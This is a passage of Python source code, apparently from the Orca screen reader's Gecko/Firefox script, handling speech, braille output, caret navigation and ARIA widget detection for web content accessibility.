speech.speak(self.speechGenerator.getLocalizedRoleName(
event.source, pyatspi.ROLE_AUTOCOMPLETE))
return
default.Script.onShowingChanged(self, event)
def handleProgressBarUpdate(self, event, obj):
"""Determine whether this progress bar event should be spoken or not.
For Firefox, we don't want to speak the small "page load" progress
bar. All other Firefox progress bars get passed onto the parent
class for handling.
Arguments:
- event: if not None, the Event that caused this to happen
- obj: the Accessible progress bar object.
"""
rolesList = [pyatspi.ROLE_PROGRESS_BAR, \
pyatspi.ROLE_STATUS_BAR, \
pyatspi.ROLE_FRAME, \
pyatspi.ROLE_APPLICATION]
if not self.utilities.hasMatchingHierarchy(event.source, rolesList):
default.Script.handleProgressBarUpdate(self, event, obj)
def locusOfFocusChanged(self, event, oldFocus, newFocus):
"""Called when the object with focus changes.
Arguments:
- event: if not None, the Event that caused the change
- oldFocus: Accessible that is the old focus
- newFocus: Accessible that is the new focus
"""
if not newFocus:
orca_state.noFocusTimeStamp = time.time()
return
if self.utilities.inFindToolbar(newFocus):
self.madeFindAnnouncement = False
if not self.inDocumentContent(newFocus):
default.Script.locusOfFocusChanged(self, event, oldFocus, newFocus)
return
caretOffset = -1
if self.utilities.inFindToolbar(oldFocus):
newFocus, caretOffset = self.getCaretContext()
text = self.utilities.queryNonEmptyText(newFocus)
if text and (0 <= text.caretOffset < text.characterCount):
caretOffset = text.caretOffset
self.setCaretContext(newFocus, caretOffset)
default.Script.locusOfFocusChanged(self, event, oldFocus, newFocus)
def findObjectOnLine(self, obj, offset, contents):
"""Determines if the item described by the object and offset is
in the line contents.
Arguments:
- obj: the Accessible
- offset: the character offset within obj
- contents: a list of (obj, startOffset, endOffset, string) tuples
Returns the index of the item if found; -1 if not found.
"""
if not obj or not contents or not len(contents):
return -1
index = -1
for content in contents:
[candidate, start, end, string] = content
# When we get the line contents, we include a focusable list
# as a list and combo box as a combo box because that is what
# we want to present. However, when we set the caret context,
# we set it to the position (and object) that immediately
# precedes it. Therefore, that's what we need to look at when
# trying to determine our position.
#
try:
role = candidate.getRole()
except (LookupError, RuntimeError):
role = None
try:
state = candidate.getState()
except (LookupError, RuntimeError):
state = pyatspi.StateSet()
if role in [pyatspi.ROLE_LIST, pyatspi.ROLE_COMBO_BOX] \
and state.contains(pyatspi.STATE_FOCUSABLE) \
and not self.utilities.isSameObject(obj, candidate):
start = self.utilities.characterOffsetInParent(candidate)
end = start + 1
candidate = candidate.parent
if self.utilities.isSameObject(obj, candidate) \
and (start <= offset < end or role == pyatspi.ROLE_ENTRY):
index = contents.index(content)
break
return index
def _updateLineCache(self, obj, offset):
"""Tries to intelligently update our stored lines. Destroying them if
need be.
Arguments:
- obj: the Accessible
- offset: the character offset within obj
"""
index = self.findObjectOnLine(obj, offset, self.currentLineContents)
if index < 0:
index = self.findObjectOnLine(obj,
offset,
self._previousLineContents)
if index >= 0:
self._nextLineContents = self.currentLineContents
self.currentLineContents = self._previousLineContents
self._previousLineContents = None
else:
index = self.findObjectOnLine(obj,
offset,
self._nextLineContents)
if index >= 0:
self._previousLineContents = self.currentLineContents
self.currentLineContents = self._nextLineContents
self._nextLineContents = None
else:
self._destroyLineCache()
def _destroyLineCache(self):
"""Removes all of the stored lines."""
self._previousLineContents = None
self.currentLineContents = None
self._nextLineContents = None
self.currentAttrs = {}
def presentLine(self, obj, offset):
"""Presents the current line in speech and in braille.
Arguments:
- obj: the Accessible at the caret
- offset: the offset within obj
"""
contents = self.currentLineContents
index = self.findObjectOnLine(obj, offset, contents)
if index < 0:
self.currentLineContents = self.getLineContentsAtOffset(obj,
offset)
if not isinstance(orca_state.lastInputEvent, input_event.BrailleEvent):
self.speakContents(self.currentLineContents)
self.updateBraille(obj)
def updateBraille(self, obj, extraRegion=None):
"""Updates the braille display to show the given object.
Arguments:
- obj: the Accessible
- extra: extra Region to add to the end
"""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: update disabled")
return
if self.isAriaWidget(obj) or not self.inDocumentContent():
default.Script.updateBraille(self, obj, extraRegion)
return
if not obj:
return
line = self.getNewBrailleLine(clearBraille=True, addLine=True)
# Some text areas have a character offset of -1 when you tab
# into them. In these cases, they show all the text as being
# selected. We don't know quite what to do in that case,
# so we'll just pretend the caret is at the beginning (0).
#
[focusedObj, focusedCharacterOffset] = self.getCaretContext()
# [[[TODO: HACK - WDW when composing e-mail in Thunderbird and
# when entering text in editable text areas, Gecko likes to
# force the last character of a line to be a newline. So,
# we adjust for this because we want to keep meaningful text
# on the display.]]]
#
needToRefresh = False
lineContentsOffset = focusedCharacterOffset
focusedObjText = self.utilities.queryNonEmptyText(focusedObj)
if focusedObjText:
char = focusedObjText.getText(focusedCharacterOffset,
focusedCharacterOffset + 1)
if char == "\n":
lineContentsOffset = max(0, focusedCharacterOffset - 1)
needToRefresh = True
if not self.isNavigableAria(focusedObj):
# Sometimes looking for the first caret context means that we
# are on a child within a non-navigable object (such as the
# text within a page tab). If so, set the focusedObj to the
# parent widget.
#
if not self.isAriaWidget(focusedObj):
focusedObj, focusedCharacterOffset = focusedObj.parent, 0
lineContentsOffset = 0
# Sometimes we just want to present the current object rather
# than the full line. For instance, if we're on a slider we
# should just present that slider. We'll assume we want the
# full line, however.
#
presentOnlyFocusedObj = False
if focusedObj and focusedObj.getRole() == pyatspi.ROLE_SLIDER:
presentOnlyFocusedObj = True
contents = self.currentLineContents
index = self.findObjectOnLine(focusedObj,
max(0, lineContentsOffset),
contents)
if index < 0 or needToRefresh:
contents = self.getLineContentsAtOffset(focusedObj,
max(0, lineContentsOffset))
self.currentLineContents = contents
index = self.findObjectOnLine(focusedObj,
max(0, lineContentsOffset),
contents)
if not len(contents):
return
whitespace = [" ", "\n", self.NO_BREAK_SPACE_CHARACTER]
focusedRegion = None
for i, content in enumerate(contents):
isFocusedObj = (i == index)
[obj, startOffset, endOffset, string] = content
if not obj:
continue
elif presentOnlyFocusedObj and not isFocusedObj:
continue
role = obj.getRole()
if (not len(string) and role != pyatspi.ROLE_PARAGRAPH) \
or self.utilities.isEntry(obj) \
or self.utilities.isPasswordText(obj) \
or role in [pyatspi.ROLE_LINK, pyatspi.ROLE_PUSH_BUTTON]:
[regions, fRegion] = \
self.brailleGenerator.generateBraille(obj)
if isFocusedObj:
focusedRegion = fRegion
else:
regions = [self.getNewBrailleText(obj,
startOffset=startOffset,
endOffset=endOffset)]
if role == pyatspi.ROLE_CAPTION:
regions.append(self.getNewBrailleRegion(
" " + self.brailleGenerator.getLocalizedRoleName(obj)))
if isFocusedObj:
focusedRegion = regions[0]
# We only want to display the heading role and level if we
# have found the final item in that heading, or if that
# heading contains no children.
#
isLastObject = (i == len(contents) - 1)
if role == pyatspi.ROLE_HEADING \
and (isLastObject or not obj.childCount):
heading = obj
elif isLastObject:
heading = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_HEADING], [pyatspi.ROLE_DOCUMENT_FRAME])
else:
heading = None
if heading:
level = self.getHeadingLevel(heading)
headingString = \
object_properties.ROLE_HEADING_LEVEL_BRAILLE % level
if not string.endswith(" "):
headingString = " " + headingString
if not isLastObject:
headingString += " "
regions.append(self.getNewBrailleRegion((headingString)))
# Add whitespace if we need it. [[[TODO: JD - But should we be
# doing this in the braille generators rather than here??]]]
#
if regions and len(line.regions) \
and regions[0].string and line.regions[-1].string \
and not regions[0].string[0] in whitespace \
and not line.regions[-1].string[-1] in whitespace:
# There is nothing separating the previous braille region from
# this one. We might or might not want to add some whitespace
# for readability.
#
lastObj = contents[i - 1][0]
# If we have two of the same braille class, or if the previous
# region is a component or a generic region, or an image link,
# we should add some space.
#
if line.regions[-1].__class__ == regions[0].__class__ \
or line.regions[-1].__class__ in [braille.Component,
braille.Region] \
or lastObj.getRole() == pyatspi.ROLE_IMAGE \
or obj.getRole() == pyatspi.ROLE_IMAGE:
self.addToLineAsBrailleRegion(" ", line)
# The above check will catch table cells with uniform
# contents and form fields -- and do so more efficiently
# than walking up the hierarchy. But if we have a cell
# with text next to a cell with a link.... Ditto for
# sections on the same line.
#
else:
layoutRoles = [pyatspi.ROLE_TABLE_CELL,
pyatspi.ROLE_SECTION,
pyatspi.ROLE_LIST_ITEM]
if role in layoutRoles:
acc1 = obj
else:
acc1 = self.utilities.ancestorWithRole(
obj, layoutRoles, [pyatspi.ROLE_DOCUMENT_FRAME])
if acc1:
if lastObj.getRole() == acc1.getRole():
acc2 = lastObj
else:
acc2 = self.utilities.ancestorWithRole(
lastObj,
layoutRoles,
[pyatspi.ROLE_DOCUMENT_FRAME])
if not self.utilities.isSameObject(acc1, acc2):
self.addToLineAsBrailleRegion(" ", line)
self.addBrailleRegionsToLine(regions, line)
if isLastObject:
line.regions[-1].string = line.regions[-1].string.rstrip(" ")
# If we're inside of a combo box, we only want to display
# the selected menu item.
#
if obj.getRole() == pyatspi.ROLE_MENU_ITEM \
and obj.getState().contains(pyatspi.STATE_FOCUSED):
break
if extraRegion:
self.addBrailleRegionToLine(extraRegion, line)
self.setBrailleFocus(focusedRegion, getLinkMask=False)
self.refreshBraille(panToCursor=True, getLinkMask=False)
def sayCharacter(self, obj):
"""Speaks the character at the current caret position."""
# We need to handle HTML content differently because of the
# EMBEDDED_OBJECT_CHARACTER model of Gecko. For all other
# things, however, we can defer to the default scripts.
#
if not self.inDocumentContent() or self.utilities.isEntry(obj):
default.Script.sayCharacter(self, obj)
return
[obj, characterOffset] = self.getCaretContext()
text = self.utilities.queryNonEmptyText(obj)
if text:
# If the caret is at the end of text and we're not in an
# entry, something bad is going on, so decrement the offset
# before speaking the character.
#
string = text.getText(0, -1)
if characterOffset >= len(string) \
and not obj.getState().contains(pyatspi.STATE_EDITABLE):
print("YIKES in Gecko.sayCharacter!")
characterOffset -= 1
if characterOffset >= 0:
self.speakCharacterAtOffset(obj, characterOffset)
def sayWord(self, obj):
"""Speaks the word at the current caret position."""
# We need to handle HTML content differently because of the
# EMBEDDED_OBJECT_CHARACTER model of Gecko. For all other
# things, however, we can defer to the default scripts.
#
if not self.inDocumentContent():
default.Script.sayWord(self, obj)
return
[obj, characterOffset] = self.getCaretContext()
text = self.utilities.queryNonEmptyText(obj)
if text:
# [[[TODO: WDW - the caret might be at the end of the text.
# Not quite sure what to do in this case. What we'll do here
# is just speak the previous word. But...maybe we want to
# make sure we say something like "end of line" or move the
# caret context to the beginning of the next word via
# a call to goNextWord.]]]
#
string = text.getText(0, -1)
if characterOffset >= len(string) \
and not obj.getState().contains(pyatspi.STATE_EDITABLE):
print("YIKES in Gecko.sayWord!")
characterOffset -= 1
# Ideally in an entry we would just let default.sayWord() handle
# things. That fails to work when navigating backwords by word.
# Because getUtterancesFromContents() now uses the speech_generator
# with entries, we need to handle word navigation in entries here.
#
wordContents = self.getWordContentsAtOffset(obj, characterOffset)
[textObj, startOffset, endOffset, word] = wordContents[0]
self.speakMisspelledIndicator(textObj, startOffset)
if not self.utilities.isEntry(textObj):
self.speakContents(wordContents)
else:
word = self.utilities.substring(textObj, startOffset, endOffset)
speech.speak([word], self.getACSS(textObj, word))
def sayLine(self, obj):
"""Speaks the line at the current caret position."""
# We need to handle HTML content differently because of the
# EMBEDDED_OBJECT_CHARACTER model of Gecko. For all other
# things, however, we can defer to the default scripts.
#
if not self.inDocumentContent() or self.utilities.isEntry(obj):
default.Script.sayLine(self, obj)
return
[obj, characterOffset] = self.getCaretContext()
text = self.utilities.queryNonEmptyText(obj)
if text:
# [[[TODO: WDW - the caret might be at the end of the text.
# Not quite sure what to do in this case. What we'll do here
# is just speak the current line. But...maybe we want to
# make sure we say something like "end of line" or move the
# caret context to the beginning of the next line via
# a call to goNextLine.]]]
#
string = text.getText(0, -1)
if characterOffset >= len(string) \
and not obj.getState().contains(pyatspi.STATE_EDITABLE):
print("YIKES in Gecko.sayLine!")
characterOffset -= 1
self.speakContents(self.getLineContentsAtOffset(obj, characterOffset))
def panBrailleLeft(self, inputEvent=None, panAmount=0):
"""In document content, we want to use the panning keys to browse the
entire document.
"""
if self.flatReviewContext \
or self.isAriaWidget(orca_state.locusOfFocus) \
or not self.inDocumentContent() \
or not self.isBrailleBeginningShowing():
default.Script.panBrailleLeft(self, inputEvent, panAmount)
else:
self.goPreviousLine(inputEvent)
while self.panBrailleInDirection(panToLeft=False):
pass
self.refreshBraille(False)
return True
def panBrailleRight(self, inputEvent=None, panAmount=0):
"""In document content, we want to use the panning keys to browse the
entire document.
"""
if self.flatReviewContext \
or self.isAriaWidget(orca_state.locusOfFocus) \
or not self.inDocumentContent() \
or not self.isBrailleEndShowing():
default.Script.panBrailleRight(self, inputEvent, panAmount)
elif self.goNextLine(inputEvent):
while self.panBrailleInDirection(panToLeft=True):
pass
self.refreshBraille(False)
return True
####################################################################
# #
# Utility Methods #
# #
####################################################################
def inDocumentContent(self, obj=None):
"""Returns True if the given object (defaults to the current
locus of focus is in the document content).
"""
if not obj:
obj = orca_state.locusOfFocus
try:
return self.generatorCache['inDocumentContent'][obj]
except:
pass
result = False
while obj:
role = obj.getRole()
if role == pyatspi.ROLE_DOCUMENT_FRAME \
or role == pyatspi.ROLE_EMBEDDED:
result = True
break
else:
obj = obj.parent
if 'inDocumentContent' not in self.generatorCache:
self.generatorCache['inDocumentContent'] = {}
if obj:
self.generatorCache['inDocumentContent'][obj] = result
return result
def useCaretNavigationModel(self, keyboardEvent):
"""Returns True if we should do our own caret navigation.
"""
if not script_settings.controlCaretNavigation:
return False
if not self.inDocumentContent():
return False
if not self.isNavigableAria(orca_state.locusOfFocus):
return False
if keyboardEvent.event_string in ["Page_Up", "Page_Down"]:
return False
if keyboardEvent.modifiers & settings.SHIFT_MODIFIER_MASK:
return False
if self._loadingDocumentContent:
return False
if not orca_state.locusOfFocus:
return False
weHandleIt = True
obj = orca_state.locusOfFocus
role = obj.getRole()
if self.utilities.isEntry(obj):
text = obj.queryText()
length = text.characterCount
caretOffset = text.caretOffset
singleLine = obj.getState().contains(
pyatspi.STATE_SINGLE_LINE)
# Single line entries have an additional newline character
# at the end.
#
newLineAdjustment = int(not singleLine)
# Home and End should not be overridden if we're in an
# entry.
#
if keyboardEvent.event_string in ["Home", "End"]:
return False
# We want to use our caret navigation model in an entry if
# there's nothing in the entry, we're at the beginning of
# the entry and press Left or Up, or we're at the end of the
# entry and press Right or Down.
#
if length == 0 \
or ((length == 1) and (text.getText(0, -1) == "\n")):
weHandleIt = True
elif caretOffset <= 0:
weHandleIt = keyboardEvent.event_string \
in ["Up", "Left"]
elif caretOffset >= length - newLineAdjustment \
and not self._autocompleteVisible:
weHandleIt = keyboardEvent.event_string \
in ["Down", "Right"]
else:
weHandleIt = False
if singleLine and not weHandleIt \
and not self._autocompleteVisible:
weHandleIt = keyboardEvent.event_string in ["Up", "Down"]
elif keyboardEvent.modifiers & settings.ALT_MODIFIER_MASK:
# Alt+Down Arrow is the Firefox command to expand/collapse the
# *currently focused* combo box. When Orca is controlling the
# caret, it is possible to navigate into a combo box *without
# giving focus to that combo box*. Under these circumstances,
# the menu item has focus. Because the user knows that he/she
# is on a combo box, he/she expects to be able to use Alt+Down
# Arrow to expand the combo box. Therefore, if a menu item has
# focus and Alt+Down Arrow is pressed, we will handle it by
# giving the combo box focus and expanding it as the user
# expects. We also want to avoid grabbing focus on a combo box.
# Therefore, if the caret is immediately before a combo box,
# we'll hand it the same way.
#
if keyboardEvent.event_string == "Down":
[obj, offset] = self.getCaretContext()
index = self.getChildIndex(obj, offset)
if index >= 0:
weHandleIt = \
obj[index].getRole() == pyatspi.ROLE_COMBO_BOX
if not weHandleIt:
weHandleIt = role == pyatspi.ROLE_MENU_ITEM
elif role in [pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_MENU_ITEM]:
weHandleIt = keyboardEvent.event_string in ["Left", "Right"]
elif role == pyatspi.ROLE_LIST_ITEM:
weHandleIt = not obj.getState().contains(pyatspi.STATE_FOCUSED)
elif role == pyatspi.ROLE_LIST:
weHandleIt = not obj.getState().contains(pyatspi.STATE_FOCUSABLE)
return weHandleIt
def useStructuralNavigationModel(self):
"""Returns True if we should do our own structural navigation.
This should return False if we're in something like an entry
or a list.
"""
letThemDoItEditableRoles = [pyatspi.ROLE_ENTRY,
pyatspi.ROLE_TEXT,
pyatspi.ROLE_PASSWORD_TEXT]
letThemDoItSelectionRoles = [pyatspi.ROLE_LIST,
pyatspi.ROLE_LIST_ITEM,
pyatspi.ROLE_MENU_ITEM]
if not self.structuralNavigation.enabled:
return False
if not self.isNavigableAria(orca_state.locusOfFocus):
return False
if self._loadingDocumentContent:
return False
# If the Orca_Modifier key was pressed, we're handling it.
#
if isinstance(orca_state.lastInputEvent, input_event.KeyboardEvent):
mods = orca_state.lastInputEvent.modifiers
isOrcaKey = mods & settings.ORCA_MODIFIER_MASK
if isOrcaKey:
return True
obj = orca_state.locusOfFocus
while obj:
if obj.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
# Don't use the structural navivation model if the
# user is editing the document.
return not obj.getState().contains(pyatspi.STATE_EDITABLE)
elif obj.getRole() in letThemDoItEditableRoles:
return not obj.getState().contains(pyatspi.STATE_EDITABLE)
elif obj.getRole() in letThemDoItSelectionRoles:
return not obj.getState().contains(pyatspi.STATE_FOCUSED)
elif obj.getRole() == pyatspi.ROLE_COMBO_BOX:
return False
else:
obj = obj.parent
return False
def isNavigableAria(self, obj):
"""Returns True if the object being examined is an ARIA widget where
we want to provide Orca keyboard navigation. Returning False
indicates that we want Firefox to handle key commands.
"""
try:
state = obj.getState()
except (LookupError, RuntimeError):
debug.println(debug.LEVEL_SEVERE,
"isNavigableAria() - obj no longer exists")
return True
except:
pass
else:
# If the current object isn't even showing, we don't want to hand
# this off to Firefox's native caret navigation because who knows
# where we'll wind up....
#
if not state.contains(pyatspi.STATE_SHOWING):
return True
# Sometimes the child of an ARIA widget claims focus. It may lack
# the attributes we're looking for. Therefore, if obj is not an
# ARIA widget, we'll also consider the parent's attributes.
#
attrs = self._getAttrDictionary(obj)
if obj and not self.isAriaWidget(obj):
attrs.update(self._getAttrDictionary(obj.parent))
try:
# ARIA landmark widgets
if set(attrs['xml-roles'].split()).intersection(\
set(settings.ariaLandmarks)):
return True
# ARIA live region
elif 'container-live' in attrs:
return True
# Don't treat links as ARIA widgets. And we should be able to
# escape/exit ARIA entries just like we do HTML entries (How
# is the user supposed to know which he/she happens to be in?)
#
elif obj.getRole() in [pyatspi.ROLE_ENTRY,
pyatspi.ROLE_LINK,
pyatspi.ROLE_ALERT,
pyatspi.ROLE_PARAGRAPH,
pyatspi.ROLE_SECTION]:
return obj.parent.getRole() not in [pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_PAGE_TAB]
# All other ARIA widgets we will assume are navigable if
# they are not focused.
#
else:
return not obj.getState().contains(pyatspi.STATE_FOCUSABLE)
except (KeyError, TypeError):
return True
def isAriaWidget(self, obj=None):
"""Returns True if the object being examined is an ARIA widget.
Arguments:
- obj: The accessible object of interest. If None, the
locusOfFocus is examined.
"""
try:
return self.generatorCache['isAria'][obj]
except:
pass
obj = obj or orca_state.locusOfFocus
# TODO - JD: It seems insufficient to take a "if it's ARIA, use
# the default script" approach. For instance, an ARIA dialog does
# not have "unrelated labels"; it has embedded object characters
# just like other Gecko content. Unless and until Gecko exposes
# ARIA widgets as proper widgets, we'll need to not be so trusting.
# For now, just add hacks on a per-case basis until there is time
# to properly review this code.
try:
role = obj.getRole()
except:
pass
else:
if role in [pyatspi.ROLE_DIALOG, pyatspi.ROLE_ALERT]:
return False
attrs = self._getAttrDictionary(obj)
if 'isAria' not in self.generatorCache:
self.generatorCache['isAria'] = {}
self.generatorCache['isAria'][obj] = \
('xml-roles' in attrs and 'live' not in attrs)
return self.generatorCache['isAria'][obj]
def _getAttrDictionary(self, obj):
if not obj:
return {}
try:
return dict([attr.split(':', 1) for attr in obj.getAttributes()])
except:
return {}
def handleAsLiveRegion(self, event):
"""Returns True if the given event (object:children-changed, object:
text-insert only) should be considered a live region event"""
if self._loadingDocumentContent \
or not _settingsManager.getSetting('inferLiveRegions'):
return False
attrs = self._getAttrDictionary(event.source)
if 'container-live' in attrs:
return True
return False
def getChildIndex(self, obj, characterOffset):
"""Given an object that implements accessible text, determine
the index of the child that is represented by an
EMBEDDED_OBJECT_CHARACTER at characterOffset in the object's
accessible text."""
try:
hypertext = obj.queryHypertext()
except NotImplementedError:
index = -1
else:
index = hypertext.getLinkIndex(characterOffset)
return index
def getExtents(self, obj, startOffset, endOffset):
"""Returns [x, y, width, height] of the text at the given offsets
if the object implements accessible text, or just the extents of
the object if it doesn't implement accessible text.
"""
if not obj:
return [0, 0, 0, 0]
# The menu items that are children of combo boxes have unique
# extents based on their physical position, even though they are
# not showing. Therefore, if the object in question is a menu
# item, get the object extents rather than the range extents for
# the text. Similarly, if it's a menu in a combo box, get the
# extents of the combo box.
#
text = self.utilities.queryNonEmptyText(obj)
if text and obj.getRole() != pyatspi.ROLE_MENU_ITEM:
extents = text.getRangeExtents(startOffset, endOffset, 0)
elif obj.getRole() == pyatspi.ROLE_MENU \
and obj.parent.getRole() == pyatspi.ROLE_COMBO_BOX:
ext = obj.parent.queryComponent().getExtents(0)
extents = [ext.x, ext.y, ext.width, ext.height]
else:
ext = obj.queryComponent().getExtents(0)
extents = [ext.x, ext.y, ext.width, ext.height]
return extents
def onSameLine(self, a, b, pixelDelta=5):
"""Determine if extents a and b are on the same line.
Arguments:
-a: [x, y, width, height]
-b: [x, y, width, height]
Returns True if a and b are on the same line.
"""
# If a and b are identical, by definition they are on the same line.
#
if a == b:
return True
# For now, we'll just take a look at the bottom of the area.
# The code after this takes the whole extents into account,
# but that logic has issues in the case where we have
# something very tall next to lots of shorter lines (e.g., an
# image with lots of text to the left or right of it. The
# number 11 here represents something that seems to work well
# with superscripts and subscripts on a line as well as pages
# with smaller fonts on them, such as craig's list.
#
if abs(a[1] - b[1]) > 11:
return False
# If there's an overlap of 1 pixel or less, they are on different
# lines. Keep in mind "lowest" and "highest" mean visually on the
# screen, but that the value is the y coordinate.
#
highestBottom = min(a[1] + a[3], b[1] + b[3])
lowestTop = max(a[1], b[1])
if lowestTop >= highestBottom - 1:
return False
return True
# If we do overlap, lets see how much. We'll require a 25% overlap
# for now...
#
#if lowestTop < highestBottom:
# overlapAmount = highestBottom - lowestTop
# shortestHeight = min(a[3], b[3])
# return ((1.0 * overlapAmount) / shortestHeight) > 0.25
#else:
# return False
def isLabellingContents(self, obj, contents):
"""Given and obj and a list of [obj, startOffset, endOffset] tuples,
determine if obj is labelling anything in the tuples.
Returns the object being labelled, or None.
"""
if obj.getRole() != pyatspi.ROLE_LABEL:
return None
relationSet = obj.getRelationSet()
if not relationSet:
return None
for relation in relationSet:
if relation.getRelationType() \
== pyatspi.RELATION_LABEL_FOR:
for i in range(0, relation.getNTargets()):
target = relation.getTarget(i)
for content in contents:
if content[0] == target:
return target
return None
def getAutocompleteEntry(self, obj):
"""Returns the ROLE_ENTRY object of a ROLE_AUTOCOMPLETE object or
None if the entry cannot be found.
"""
for child in obj:
if child and (child.getRole() == pyatspi.ROLE_ENTRY):
return child
return None
def getCellCoordinates(self, obj):
"""Returns the [row, col] of a ROLE_TABLE_CELL or [0, 0]
if the coordinates cannot be found.
"""
if obj.getRole() != pyatspi.ROLE_TABLE_CELL:
obj = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_TABLE_CELL], [pyatspi.ROLE_DOCUMENT_FRAME])
parentTable = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_TABLE], [pyatspi.ROLE_DOCUMENT_FRAME])
try:
table = parentTable.queryTable()
except:
pass
else:
index = self.utilities.cellIndex(obj)
row = table.getRowAtIndex(index)
col = table.getColumnAtIndex(index)
return [row, col]
return [0, 0]
def isBlankCell(self, obj):
"""Returns True if the table cell is empty or consists of a single
non-breaking space.
Arguments:
- obj: the table cell to examime
"""
text = self.utilities.displayedText(obj)
if text and text != '\u00A0':
return False
else:
for child in obj:
if child.getRole() == pyatspi.ROLE_LINK:
return False
return True
def isFormField(self, obj):
"""Returns True if the given object is a field inside of a form."""
if not obj or not self.inDocumentContent(obj):
return False
formRoles = [pyatspi.ROLE_CHECK_BOX,
pyatspi.ROLE_RADIO_BUTTON,
pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_DOCUMENT_FRAME,
pyatspi.ROLE_LIST,
pyatspi.ROLE_ENTRY,
pyatspi.ROLE_PASSWORD_TEXT,
pyatspi.ROLE_PUSH_BUTTON]
state = obj.getState()
isField = obj.getRole() in formRoles \
and state.contains(pyatspi.STATE_FOCUSABLE) \
and state.contains(pyatspi.STATE_SENSITIVE)
if obj.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
isField = isField and state.contains(pyatspi.STATE_EDITABLE)
return isField
def isUselessObject(self, obj):
"""Returns true if the given object is an obj that doesn't
have any meaning associated with it and it is not inside a
link."""
if not obj:
return True
useless = False
textObj = self.utilities.queryNonEmptyText(obj)
if not textObj and obj.getRole() == pyatspi.ROLE_PARAGRAPH:
# Under these circumstances, this object is useless even
# if it is the child of a link.
#
return True
elif obj.getRole() in [pyatspi.ROLE_IMAGE, \
pyatspi.ROLE_TABLE_CELL, \
pyatspi.ROLE_SECTION]:
text = self.utilities.displayedText(obj)
if (not text) or (len(text) == 0):
text = self.utilities.displayedLabel(obj)
if (not text) or (len(text) == 0):
useless = True
if useless:
link = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_LINK], [pyatspi.ROLE_DOCUMENT_FRAME])
if link:
if obj.getRole() == pyatspi.ROLE_IMAGE:
# If this object had alternative text and/or a title,
# we wouldn't be here. We need to determine if this
# image is indeed worth presenting and not a duplicate
# piece of information. See Facebook's timeline and/or
# bug 584540.
#
for child in obj.parent:
if self.utilities.displayedText(child):
# Some other sibling is presenting information.
# We'll treat this image as useless.
#
break
else:
# No other siblings are presenting information.
#
if obj.parent.getRole() == pyatspi.ROLE_LINK:
if not link.name:
# If no siblings are presenting information,
# but the link had a name, then we'd know we
# had text along with the image(s). Given the
# lack of name, we'll treat the first image as
# the useful one and ignore the rest.
#
useless = obj.getIndexInParent() > 0
else:
# The image must be in a paragraph or section or
# heading or something else that might result in
# it being on its own line.
#
textObj = \
self.utilities.queryNonEmptyText(obj.parent)
if textObj:
text = textObj.getText(0, -1)
text = text.replace(\
self.EMBEDDED_OBJECT_CHARACTER, "").strip()
if not text:
# There's no other text on this line inside
# of this link. We don't want to skip over
# this line, so we'll treat the first image
# as useful.
#
useless = obj.getIndexInParent() > 0
else:
useless = False
return useless
def pursueForFlatReview(self, obj):
"""Determines if we should look any further at the object
for flat review."""
# It should be enough to check for STATE_SHOWING, but Gecko seems
# to reverse STATE_SHOWING and STATE_VISIBLE, exposing STATE_SHOWING
# for objects which are offscreen. So, we'll check for both. See
# bug #542833. [[[TODO - JD: We're putting this check in just this
# script for now to be on the safe side. Consider for the default
# script as well?]]]
#
try:
state = obj.getState()
except:
pass
return False
else:
return state.contains(pyatspi.STATE_SHOWING) \
and state.contains(pyatspi.STATE_VISIBLE)
def getHeadingLevel(self, obj):
"""Determines the heading level of the given object. A value
of 0 means there is no heading level."""
level = 0
if obj is None:
return level
if obj.getRole() == pyatspi.ROLE_HEADING:
attributes = obj.getAttributes()
if attributes is None:
return level
for attribute in attributes:
if attribute.startswith("level:"):
level = int(attribute.split(":")[1])
break
return level
def getTopOfFile(self):
"""Returns the object and first caret offset at the top of the
document frame."""
documentFrame = self.utilities.documentFrame()
[obj, offset] = self.findFirstCaretContext(documentFrame, 0)
return [obj, offset]
def getBottomOfFile(self):
"""Returns the object and last caret offset at the bottom of the
document frame."""
documentFrame = self.utilities.documentFrame()
text = self.utilities.queryNonEmptyText(documentFrame)
if text:
char = text.getText(text.characterCount - 1, text.characterCount)
if char != self.EMBEDDED_OBJECT_CHARACTER:
return [documentFrame, text.characterCount - 1]
obj = self.getLastObject(documentFrame)
offset = 0
# If the last object is a link, it may be more efficient to check
# for text that follows.
#
if obj and obj.getRole() == pyatspi.ROLE_LINK:
text = self.utilities.queryNonEmptyText(obj.parent)
if text:
char = text.getText(text.characterCount - 1,
text.characterCount)
if char != self.EMBEDDED_OBJECT_CHARACTER:
return [obj.parent, text.characterCount - 1]
# obj should now be the very last item in the entire document frame
# and not have children of its own. Therefore, it should have text.
# If it doesn't, we don't want to be here.
#
text = self.utilities.queryNonEmptyText(obj)
if text:
offset = text.characterCount - 1
else:
obj = self.findPreviousObject(obj, documentFrame)
while obj:
[lastObj, lastOffset] = self.findNextCaretInOrder(obj, offset)
if not lastObj \
or self.utilities.isSameObject(lastObj, obj) \
and (lastOffset == offset):
break
[obj, offset] = [lastObj, lastOffset]
return [obj, offset]
def getLastObject(self, documentFrame):
"""Returns the last object in the document frame"""
try:
lastChild = documentFrame[documentFrame.childCount - 1]
except:
lastChild = documentFrame
while lastChild:
lastObj = self.findNextObject(lastChild, documentFrame)
if lastObj and lastObj != lastChild:
lastChild = lastObj
else:
break
return lastChild
def getMeaningfulObjectsFromLine(self, line):
"""Attempts to strip a list of (obj, start, end) tuples into one
that contains only meaningful objects."""
if not line or not len(line):
return []
lineContents = []
for item in line:
role = item[0].getRole()
# If it's labelling something on this line, don't move to
# it.
#
if role == pyatspi.ROLE_LABEL \
and self.isLabellingContents(item[0], line):
continue
# Rather than do a brute force label infer, we'll focus on
# entries as they are the most common and their label is
# likely on this line. The functional label may be made up
# of several objects, so we'll examine the strings of what
# we've got and pop off the ones that match.
#
elif self.utilities.isEntry(item[0]):
label = \
self.labelInference.inferFromTextLeft(item[0]) \
or self.labelInference.inferFromTextRight(item[0])
index = len(lineContents) - 1
while label and index >= 0:
prevItem = lineContents[index]
